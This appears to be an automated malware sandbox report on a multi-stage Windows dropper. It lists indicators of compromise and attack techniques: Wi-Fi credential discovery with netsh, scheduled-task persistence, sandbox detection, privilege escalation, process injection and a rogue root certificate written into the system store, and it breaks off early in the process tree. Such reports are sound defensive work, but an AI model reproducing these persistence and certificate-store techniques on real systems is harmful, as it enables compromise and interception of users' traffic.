Program crash 1 IoCs
pid pid_target Process procid_target 5784 5820 WerFault.exe 614 -
System Location Discovery: System Language Discovery 1 TTPs 52 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 4363463463464363463463463.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 335214409.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language random.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language kmvcsaed.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language run.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mos%20ssssttttt.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language crypteda.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 1547117288.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sysnldcvmr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MePaxil.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language findstr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language tasklist.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language findstr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 654932175.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language tasklist.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language del.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language pei.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ScanGuard.pif Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RegAsm.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language jopa.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Hwl7v5u9Is.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Legend.pif Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language choice.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 97976492.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 30072024.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 1GLVxaSwHn.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 1459321940.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language anticheat.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language findstr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language xeno rat server.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Setup2.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 54 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 5428 PING.EXE 5684 PING.EXE 4988 PING.EXE 1712 PING.EXE 4400 PING.EXE 5028 PING.EXE 1612 PING.EXE 6288 PING.EXE 6012 PING.EXE 7088 PING.EXE 5672 PING.EXE 5920 PING.EXE 2068 PING.EXE 4512 PING.EXE 6264 PING.EXE 5196 PING.EXE 5992 PING.EXE 3868 PING.EXE 5740 PING.EXE 1468 PING.EXE 6372 PING.EXE 6028 PING.EXE 5940 PING.EXE 6100 PING.EXE 3612 PING.EXE 5864 PING.EXE 1980 PING.EXE 2464 PING.EXE 5940 PING.EXE 2848 PING.EXE 6552 PING.EXE 3224 PING.EXE 2192 PING.EXE 5684 PING.EXE 5344 PING.EXE 2304 PING.EXE 1980 PING.EXE 2444 PING.EXE 1624 PING.EXE 4856 PING.EXE 1612 PING.EXE 5144 PING.EXE 4428 PING.EXE 5552 PING.EXE 5640 PING.EXE 2644 PING.EXE 6572 PING.EXE 7148 PING.EXE 5984 PING.EXE 3784 PING.EXE 3396 PING.EXE 4332 PING.EXE 1384 PING.EXE 6064 PING.EXE -
System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 6 IoCs
Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.
pid Process 3244 netsh.exe 2112 cmd.exe 4324 netsh.exe 1384 cmd.exe 4760 netsh.exe 4656 cmd.exe -
Checks SCSI registry key(s) 3 TTPs 6 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ConfigFlags dwm.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\HardwareID dwm.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID dwm.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000 dwm.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\ConfigFlags dwm.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000 dwm.exe -
Delays execution with timeout.exe 2 IoCs
pid Process 1956 timeout.exe 6016 timeout.exe -
Enumerates system info in registry 2 TTPs 5 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS dwm.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU dwm.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe -
Kills process with taskkill 6 IoCs
pid Process 5956 taskkill.exe 6060 taskkill.exe 5000 taskkill.exe 5976 taskkill.exe 6656 taskkill.exe 3952 taskkill.exe -
Modifies data under HKEY_USERS 20 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust dwm.exe Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry chrome.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed dwm.exe Set value (int) \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133850879537964717" chrome.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root dwm.exe -
Modifies registry class 4 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ cfx.exe Key created \REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ cfx.exe Key created \REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000_Classes\Local Settings explorer.exe Key created \REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000_Classes\Local Settings chrome.exe -
Modifies registry key 1 TTPs 2 IoCs
pid Process 2084 reg.exe 548 reg.exe -
Modifies system certificate store 2 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064 30072024.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064\Blob = 0b000000010000004800000054006900740061006e00690075006d00200052006f006f007400200043006500720074006900660069006300610074006500200041007500740068006f00720069007400790000000200000001000000cc0000001c0000006c00000001000000000000000000000000000000010000007b00340031003700340034004200450034002d0031003100430035002d0034003900340043002d0041003200310033002d004200410030004300450039003400340039003300380045007d00000000004d006900630072006f0073006f0066007400200045006e00680061006e006300650064002000430072007900700074006f0067007200610070006800690063002000500072006f00760069006400650072002000760031002e00300000000000030000000100000014000000f1a578c4cb5de79a370893983fd4da8b67b2b06420000000010000000a03000030820306308201eea003020102020867f7beb96a4c2798300d06092a864886f70d01010b0500302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f72697479301e170d3233303331343130333532305a170d3236303631373130333532305a302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f7269747930820122300d06092a864886f70d01010105000382010f003082010a028201010086e4577a5861ce819177d005fa51d5515a936c610ccfcbde5332cd151da647ee881a245c9b02833b02af3d76fe20bd3bfaf7a20973e72ebd9440d09d8c3d2713bdf0d09feb9532acd7a42da2a952daa86a2a88ee427d30959d90bfba05276aa02998a6986fc01306629b79b8405d1f1fa6d9a42f827afc7566340dc2de27012b94bb4a27b3cb1c219a3cb2c14203f34451bd626520edd4dbcc414f593f2acbc48479f7143cbe139cfd129c913e5303dc20f94c44358901b69a848d7ea02e308a311560ac00ae009a29109aeed9713dd8919b97ed598058e17f0726c7a020f710abc06291dfaaf181c6be6a76c89cb68eb0b0ec1cd95f326c7e55588bfd76c5190203010001a328302630130603551d25040c300a06082b06010505070301300f0603551d130101ff040530030101ff300d06092a864886f70d01010b0500038201010070851293d757e982797dc5f7f27da894ef0cdb329f06a6096e0cf604b0e54711560ef40f5282082e210f55a3db41f312548b7611f5f0dacea3c78b13f6fc243c02b106665be69e184088415b273999b877bee353a248cec7eeb5a095c2174bc9526cafe3372c59dbfbe758134ed351e5147273fec68577ae4552a6f99ac80ca8d0ee422af528858c6be81cb0a8031ab0ae83c0eb5564f4e87a5c06295d3903eee2fdf92d62a7f4d4054deaa79bcaebda4e8b1a6efd42aef9d01c7075728cb13aa8557c85a72532b5e2d6c3e55041c9867ca8f562bbd2ab0c3710d83173ec3781d1dcaac5c6e07ee726624dfdc5814cffd336e17932f89beb9cf7fdbee9bebf61 30072024.exe -
Runs ping.exe 1 TTPs 54 IoCs
pid Process 6064 PING.EXE 5864 PING.EXE 4428 PING.EXE 4400 PING.EXE 4988 PING.EXE 1612 PING.EXE 6288 PING.EXE 3224 PING.EXE 3784 PING.EXE 3396 PING.EXE 5672 PING.EXE 5920 PING.EXE 4856 PING.EXE 3612 PING.EXE 4512 PING.EXE 6012 PING.EXE 1712 PING.EXE 3868 PING.EXE 5428 PING.EXE 1612 PING.EXE 6572 PING.EXE 6264 PING.EXE 5684 PING.EXE 5552 PING.EXE 5640 PING.EXE 1468 PING.EXE 2644 PING.EXE 7148 PING.EXE 5196 PING.EXE 6028 PING.EXE 5940 PING.EXE 6372 PING.EXE 7088 PING.EXE 2192 PING.EXE 5144 PING.EXE 5028 PING.EXE 6552 PING.EXE 5992 PING.EXE 5940 PING.EXE 4332 PING.EXE 2304 PING.EXE 5344 PING.EXE 5740 PING.EXE 1624 PING.EXE 5684 PING.EXE 5984 PING.EXE 1384 PING.EXE 1980 PING.EXE 2444 PING.EXE 1980 PING.EXE 2464 PING.EXE 2068 PING.EXE 6100 PING.EXE 2848 PING.EXE -
Scheduled Task/Job: Scheduled Task 1 TTPs 47 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 3964 schtasks.exe 6216 schtasks.exe 5636 schtasks.exe 6336 schtasks.exe 2308 schtasks.exe 1456 schtasks.exe 6088 schtasks.exe 1812 schtasks.exe 5468 schtasks.exe 5652 schtasks.exe 6796 schtasks.exe 5644 schtasks.exe 4416 schtasks.exe 3412 schtasks.exe 3504 schtasks.exe 548 schtasks.exe 2516 schtasks.exe 4716 schtasks.exe 3296 schtasks.exe 7040 schtasks.exe 1628 schtasks.exe 1944 schtasks.exe 5784 schtasks.exe 5888 schtasks.exe 4428 schtasks.exe 6396 schtasks.exe 836 schtasks.exe 6508 schtasks.exe 1204 schtasks.exe 5704 schtasks.exe 4720 schtasks.exe 4452 schtasks.exe 5392 schtasks.exe 4332 schtasks.exe 5952 schtasks.exe 5740 schtasks.exe 6056 schtasks.exe 4476 schtasks.exe 1944 schtasks.exe 2932 schtasks.exe 5632 schtasks.exe 5416 schtasks.exe 1160 schtasks.exe 6888 schtasks.exe 5684 schtasks.exe 5420 schtasks.exe 3964 schtasks.exe -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 3788 build6_unencrypted.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 4356 Stub.exe 4356 Stub.exe 4356 Stub.exe 4356 Stub.exe 4356 Stub.exe 4356 Stub.exe 4356 Stub.exe 4356 Stub.exe 4484 powershell.exe 4484 powershell.exe 4484 powershell.exe 4240 powershell.exe 4240 powershell.exe 4240 powershell.exe 3368 powershell.exe 3368 powershell.exe 3368 powershell.exe 2620 random.exe 2620 random.exe 3076 powershell.exe 3076 powershell.exe 3076 powershell.exe 2936 XClient.exe 2936 XClient.exe 2620 random.exe 2620 random.exe 2620 random.exe 2620 random.exe 2936 XClient.exe 2936 XClient.exe 2936 XClient.exe 2936 XClient.exe 4784 Loader.exe 4784 Loader.exe 4784 Loader.exe 4784 Loader.exe 4784 Loader.exe 4784 Loader.exe 2204 powershell.exe 2204 powershell.exe 2204 powershell.exe 4452 powershell.exe 4452 powershell.exe 4452 powershell.exe 2824 chrome.exe 2824 chrome.exe 2936 XClient.exe 2936 XClient.exe 2936 XClient.exe 2936 XClient.exe 2936 XClient.exe 2936 XClient.exe 2936 XClient.exe 2936 XClient.exe 2936 XClient.exe 2936 XClient.exe 2936 XClient.exe 2936 XClient.exe 2936 XClient.exe 2936 XClient.exe 2936 XClient.exe 2936 XClient.exe 2936 XClient.exe 2936 XClient.exe -
Suspicious behavior: GetForegroundWindowSpam 3 IoCs
pid Process 2804 xeno rat server.exe 6792 mos%20ssssttttt.exe 2936 XClient.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 7 IoCs
pid Process 2824 chrome.exe 2824 chrome.exe 2824 chrome.exe 2824 chrome.exe 2824 chrome.exe 2824 chrome.exe 2824 chrome.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 1012 4363463463464363463463463.exe Token: SeDebugPrivilege 4356 Stub.exe Token: SeDebugPrivilege 2644 defender64.exe Token: SeDebugPrivilege 2936 XClient.exe Token: SeIncreaseQuotaPrivilege 1356 WMIC.exe Token: SeSecurityPrivilege 1356 WMIC.exe Token: SeTakeOwnershipPrivilege 1356 WMIC.exe Token: SeLoadDriverPrivilege 1356 WMIC.exe Token: SeSystemProfilePrivilege 1356 WMIC.exe Token: SeSystemtimePrivilege 1356 WMIC.exe Token: SeProfSingleProcessPrivilege 1356 WMIC.exe Token: SeIncBasePriorityPrivilege 1356 WMIC.exe Token: SeCreatePagefilePrivilege 1356 WMIC.exe Token: SeBackupPrivilege 1356 WMIC.exe Token: SeRestorePrivilege 1356 WMIC.exe Token: SeShutdownPrivilege 1356 WMIC.exe Token: SeDebugPrivilege 1356 WMIC.exe Token: SeSystemEnvironmentPrivilege 1356 WMIC.exe Token: SeRemoteShutdownPrivilege 1356 WMIC.exe Token: SeUndockPrivilege 1356 WMIC.exe Token: SeManageVolumePrivilege 1356 WMIC.exe Token: 33 1356 WMIC.exe Token: 34 1356 WMIC.exe Token: 35 1356 WMIC.exe Token: 36 1356 WMIC.exe Token: SeIncreaseQuotaPrivilege 1356 WMIC.exe Token: SeSecurityPrivilege 1356 WMIC.exe Token: SeTakeOwnershipPrivilege 1356 WMIC.exe Token: SeLoadDriverPrivilege 1356 WMIC.exe Token: SeSystemProfilePrivilege 1356 WMIC.exe Token: SeSystemtimePrivilege 1356 WMIC.exe Token: SeProfSingleProcessPrivilege 1356 WMIC.exe Token: SeIncBasePriorityPrivilege 1356 WMIC.exe Token: SeCreatePagefilePrivilege 1356 WMIC.exe Token: SeBackupPrivilege 1356 WMIC.exe Token: SeRestorePrivilege 1356 WMIC.exe Token: SeShutdownPrivilege 1356 WMIC.exe Token: SeDebugPrivilege 1356 WMIC.exe Token: SeSystemEnvironmentPrivilege 1356 WMIC.exe Token: SeRemoteShutdownPrivilege 1356 WMIC.exe Token: SeUndockPrivilege 1356 WMIC.exe Token: SeManageVolumePrivilege 1356 WMIC.exe Token: 33 1356 WMIC.exe Token: 34 1356 WMIC.exe Token: 35 1356 WMIC.exe Token: 36 1356 WMIC.exe Token: SeDebugPrivilege 3604 defenderx64.exe Token: SeDebugPrivilege 4484 powershell.exe Token: SeDebugPrivilege 4240 powershell.exe Token: SeDebugPrivilege 3368 powershell.exe Token: SeDebugPrivilege 3076 powershell.exe Token: SeIncreaseQuotaPrivilege 4712 WMIC.exe Token: SeSecurityPrivilege 4712 WMIC.exe Token: SeTakeOwnershipPrivilege 4712 WMIC.exe Token: SeLoadDriverPrivilege 4712 WMIC.exe Token: SeSystemProfilePrivilege 4712 WMIC.exe Token: SeSystemtimePrivilege 4712 WMIC.exe Token: SeProfSingleProcessPrivilege 4712 WMIC.exe Token: SeIncBasePriorityPrivilege 4712 WMIC.exe Token: SeCreatePagefilePrivilege 4712 WMIC.exe Token: SeBackupPrivilege 4712 WMIC.exe Token: SeRestorePrivilege 4712 WMIC.exe Token: SeShutdownPrivilege 4712 WMIC.exe Token: SeDebugPrivilege 4712 WMIC.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
pid Process 3604 defenderx64.exe 1232 defenderx64.exe 4220 defenderx64.exe 4432 defenderx64.exe 1092 defenderx64.exe 4344 defenderx64.exe 2824 chrome.exe 2824 chrome.exe 2824 chrome.exe 2824 chrome.exe 2824 chrome.exe 2824 chrome.exe 2824 chrome.exe 2824 chrome.exe 2824 chrome.exe 2824 chrome.exe 2824 chrome.exe 2824 chrome.exe 2824 chrome.exe 2824 chrome.exe 2824 chrome.exe 2824 chrome.exe 2824 chrome.exe 2824 chrome.exe 2824 chrome.exe 2824 chrome.exe 2824 chrome.exe 2824 chrome.exe 2824 chrome.exe 2824 chrome.exe 2824 chrome.exe 2824 chrome.exe 5216 2klz.exe 5592 defenderx64.exe 5292 Client.exe 5848 Legend.pif 5848 Legend.pif 5848 Legend.pif 5708 2klz.exe 3876 defenderx64.exe 760 wget.exe 5932 wget.exe 5320 defenderx64.exe 5348 2klz.exe 5568 wget.exe 5732 defenderx64.exe 1900 wget.exe 5152 2klz.exe 2824 chrome.exe 2824 chrome.exe 2824 chrome.exe 2824 chrome.exe 2824 chrome.exe 2824 chrome.exe 2824 chrome.exe 2824 chrome.exe 2824 chrome.exe 6132 2klz.exe 5300 defenderx64.exe 4340 2klz.exe 5456 defenderx64.exe 5536 2klz.exe 5688 defenderx64.exe 4408 2klz.exe -
Suspicious use of SendNotifyMessage 64 IoCs
pid Process 3604 defenderx64.exe 1232 defenderx64.exe 4220 defenderx64.exe 4432 defenderx64.exe 1092 defenderx64.exe 4344 defenderx64.exe 2824 chrome.exe 2824 chrome.exe 2824 chrome.exe 2824 chrome.exe 2824 chrome.exe 2824 chrome.exe 2824 chrome.exe 2824 chrome.exe 2824 chrome.exe 2824 chrome.exe 2824 chrome.exe 2824 chrome.exe 2824 chrome.exe 2824 chrome.exe 2824 chrome.exe 2824 chrome.exe 2824 chrome.exe 2824 chrome.exe 2824 chrome.exe 2824 chrome.exe 2824 chrome.exe 2824 chrome.exe 2824 chrome.exe 2824 chrome.exe 5216 2klz.exe 5592 defenderx64.exe 5292 Client.exe 5848 Legend.pif 5848 Legend.pif 5848 Legend.pif 5708 2klz.exe 3876 defenderx64.exe 5320 defenderx64.exe 5348 2klz.exe 5732 defenderx64.exe 5152 2klz.exe 6132 2klz.exe 5300 defenderx64.exe 4340 2klz.exe 5456 defenderx64.exe 5536 2klz.exe 5688 defenderx64.exe 4408 2klz.exe 6120 defenderx64.exe 1576 2klz.exe 2548 defenderx64.exe 2000 2klz.exe 5076 defenderx64.exe 4864 2klz.exe 6632 defenderx64.exe 7152 2klz.exe 5764 defenderx64.exe 4848 2klz.exe 7028 defenderx64.exe 2848 2klz.exe 4372 defenderx64.exe 2720 2klz.exe 6924 defenderx64.exe -
Suspicious use of SetWindowsHookEx 10 IoCs
pid Process 2936 XClient.exe 4784 Loader.exe 5524 powerstealer.exe 5292 Client.exe 5708 2klz.exe 5348 2klz.exe 2848 2klz.exe 5208 2klz.exe 5972 2klz.exe 6648 Svchost.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1012 wrote to memory of 2332 1012 4363463463464363463463463.exe 100 PID 1012 wrote to memory of 2332 1012 4363463463464363463463463.exe 100 PID 2332 wrote to memory of 4356 2332 Stub.exe 101 PID 2332 wrote to memory of 4356 2332 Stub.exe 101 PID 1012 wrote to memory of 2644 1012 4363463463464363463463463.exe 102 PID 1012 wrote to memory of 2644 1012 4363463463464363463463463.exe 102 PID 4356 wrote to memory of 2404 4356 Stub.exe 105 PID 4356 wrote to memory of 2404 4356 Stub.exe 105 PID 1012 wrote to memory of 2936 1012 4363463463464363463463463.exe 107 PID 1012 wrote to memory of 2936 1012 4363463463464363463463463.exe 107 PID 4356 wrote to memory of 3084 4356 Stub.exe 108 PID 4356 wrote to memory of 3084 4356 Stub.exe 108 PID 3084 wrote to memory of 1356 3084 cmd.exe 110 PID 3084 wrote to memory of 1356 3084 cmd.exe 110 PID 1012 wrote to memory of 4560 1012 4363463463464363463463463.exe 111 PID 1012 wrote to memory of 4560 1012 4363463463464363463463463.exe 111 PID 1012 wrote to memory of 4560 1012 4363463463464363463463463.exe 111 PID 2644 wrote to memory of 3412 2644 defender64.exe 112 PID 2644 wrote to memory of 3412 2644 defender64.exe 112 PID 2644 wrote to memory of 3604 2644 defender64.exe 114 PID 2644 wrote to memory of 3604 2644 defender64.exe 114 PID 4356 wrote to memory of 3992 4356 Stub.exe 115 PID 4356 wrote to memory of 3992 4356 Stub.exe 115 PID 3992 wrote to memory of 2084 3992 cmd.exe 117 PID 3992 wrote to memory of 2084 3992 cmd.exe 117 PID 4356 wrote to memory of 2572 4356 Stub.exe 118 PID 4356 wrote to memory of 2572 4356 Stub.exe 118 PID 2572 wrote to memory of 548 2572 cmd.exe 141 PID 2572 wrote to memory of 548 2572 cmd.exe 141 PID 3604 wrote to memory of 4720 3604 defenderx64.exe 121 PID 3604 wrote to memory of 4720 3604 defenderx64.exe 121 PID 2936 wrote to memory of 4484 2936 XClient.exe 123 PID 2936 wrote to memory of 4484 2936 XClient.exe 123 PID 3604 wrote to memory of 896 3604 defenderx64.exe 125 PID 3604 wrote to memory of 896 3604 defenderx64.exe 125 PID 2936 wrote to memory of 4240 2936 XClient.exe 127 PID 2936 wrote to memory of 4240 2936 XClient.exe 127 PID 896 wrote to memory of 3876 896 cmd.exe 129 PID 896 wrote to memory of 3876 896 cmd.exe 129 PID 896 wrote to memory of 3784 896 cmd.exe 130 PID 896 wrote to memory of 3784 896 cmd.exe 130 PID 2936 wrote to memory of 3368 2936 XClient.exe 132 PID 2936 wrote to memory of 3368 2936 XClient.exe 132 PID 1012 wrote to memory of 2620 1012 4363463463464363463463463.exe 134 PID 1012 wrote to memory of 2620 1012 4363463463464363463463463.exe 134 PID 1012 wrote to memory of 2620 1012 4363463463464363463463463.exe 134 PID 2936 wrote to memory of 3076 2936 XClient.exe 135 PID 2936 wrote to memory of 3076 2936 XClient.exe 135 PID 4356 wrote to memory of 392 4356 Stub.exe 137 PID 4356 wrote to memory of 392 4356 Stub.exe 137 PID 392 wrote to memory of 4712 392 cmd.exe 139 PID 392 wrote to memory of 4712 392 cmd.exe 139 PID 1012 wrote to memory of 928 1012 4363463463464363463463463.exe 140 PID 1012 wrote to memory of 928 1012 4363463463464363463463463.exe 140 PID 928 wrote to memory of 548 928 Reaper%20cfx%20Spoofer%20V2.exe 141 PID 928 wrote to memory of 548 928 Reaper%20cfx%20Spoofer%20V2.exe 141 PID 548 wrote to memory of 3832 548 cfx.exe 143 PID 548 wrote to memory of 3832 548 cfx.exe 143 PID 2936 wrote to memory of 1944 2936 XClient.exe 144 PID 2936 wrote to memory of 1944 2936 XClient.exe 144 PID 4356 wrote to memory of 3688 4356 Stub.exe 146 PID 4356 wrote to memory of 3688 4356 Stub.exe 146 PID 3688 wrote to memory of 4056 3688 cmd.exe 148 PID 3688 wrote to memory of 4056 3688 cmd.exe 148 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Views/modifies file attributes 1 TTPs 5 IoCs
pid Process 3412 attrib.exe 5392 attrib.exe 5460 attrib.exe 5276 attrib.exe 4428 attrib.exe
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵PID:3400
-
C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe"C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe"2⤵
- Downloads MZ/PE file
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1012 -
C:\Users\Admin\AppData\Local\Temp\Files\Stub.exe"C:\Users\Admin\AppData\Local\Temp\Files\Stub.exe"3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2332 -
C:\Users\Admin\AppData\Local\Temp\Files\Stub.exe"C:\Users\Admin\AppData\Local\Temp\Files\Stub.exe"4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4356 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "ver"5⤵PID:2404
-
-
